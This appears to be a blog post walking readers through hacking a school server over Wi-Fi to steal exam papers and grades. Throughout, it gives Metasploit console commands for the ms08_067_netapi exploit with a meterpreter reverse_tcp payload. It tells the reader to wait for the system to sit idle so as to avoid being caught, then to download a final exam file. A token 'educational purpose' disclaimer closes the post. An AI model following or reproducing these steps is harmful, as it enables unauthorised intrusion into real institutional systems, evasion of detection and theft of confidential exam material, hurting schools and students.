HOW TO HACK YOUR SCHOOL SERVER OVER WIFI ?
EVERYONE WANTS TO HACK THEIR SCHOOL COMPUTERS AND GET MARKS DATA OR QUESTION PAPERS !!! EVERY SCHOOL HAS A SERVER WHICH HAVE ALL THE DATA RELATED TO EVERYTHING IN IT SO BASICALLY WE ARE HACKING SERVER !
PRE-REQUIRED THINGS BEFORE THE HACK
1. Server must be connected over Wi-Fi.
2. OS on which Server is operating .
LETS START THE HACK !
1.We need to hack the Wi-Fi of the school to get into the network and start the attack .
given below is the easiest and fastest method ( no bruteforcing or other password cracking methods )
2. Lets assume you hacked down the wifi ! Then You can get the OS of the server by using basic Nmap scan !
3. We will be using Metasploit for this attack !
4. we will be using /exploit/windows/smb/ms08_067_netapi .
you can search for this exploit in msfconsole by typing
msf > search ms08
5. Now use the exploit in our console by typing
msf > use /exploit/windows/smb/ms08_067_netapi
6. Then set the payload . we will be using meterpreter for windows or /windows/meterpreter/reverse_tcp
you can set the payload by typing
msf > set payload /windows/meterpreter/reverse_tcp
msf > show options
as in given pic we need to give LHOST and RHOST
LHOST - run ifconfig in terminal to get.
RHOST - run a network scan using ettercap or using iwconfig.
8. Assign the LHOST and RHOST to the payload by typing
msf > set LHOST 192.168.1.114
msf > set RHOST 192.168.1.108
9. NOW EXPLOIT!
msf > exploit
WE ARE INSIDE THE SERVER !!
10. Check if the Admin is using the system by typing
meterpreter > idletime
SYSTEM IS IDLE FOR 3 MIN ! WE DON'T WANT ANY ONE TO CATCH OUR ACTIVITIES SO LETS WAIT AND LET THE SYSTEM BE IDLE FOR A WHILE.
11. Our next step is to find the root directory and find the exam papers or result. (meterpreter uses standard Linux commands like ls,cd,pwd,lpwd.
type
meterpreter > lpwd
/ represents that we are in root directory.
so lets type and ls and see all the directories. we see a directory named ConcordUniversity .
Change the directory concord university by typing
meterpreter > c:\\ConcordUniversity
now we are in ConcordUniversity let see whats inside this ! type ls
meterpreter > ls
Let we are looking for Biology final . so navigate to biology directory.
meterpreter > cd Biology
WE SEE THE FinalExam FILE !!!!!!
12 . Download the file
type:
meterpreter > download FinalExam
13. now the file will be in your local storage .
YOU HAVE SUCCESSFULLY HACKED DOWN YOUR SCHOOL SERVER !!
JUST FOR EDUCATIONAL PURPOSE . I TAKE NO RESPONSIBILITY IF YOU END IN UP JAIL ! THIS IS JUST MEANT TO SHOW HOW VULNERABLE OLD SERVER ARE ! I DID ON MY OWN COMPUTER BTW !
KEEP SUPPORTING !
Comments
Post a Comment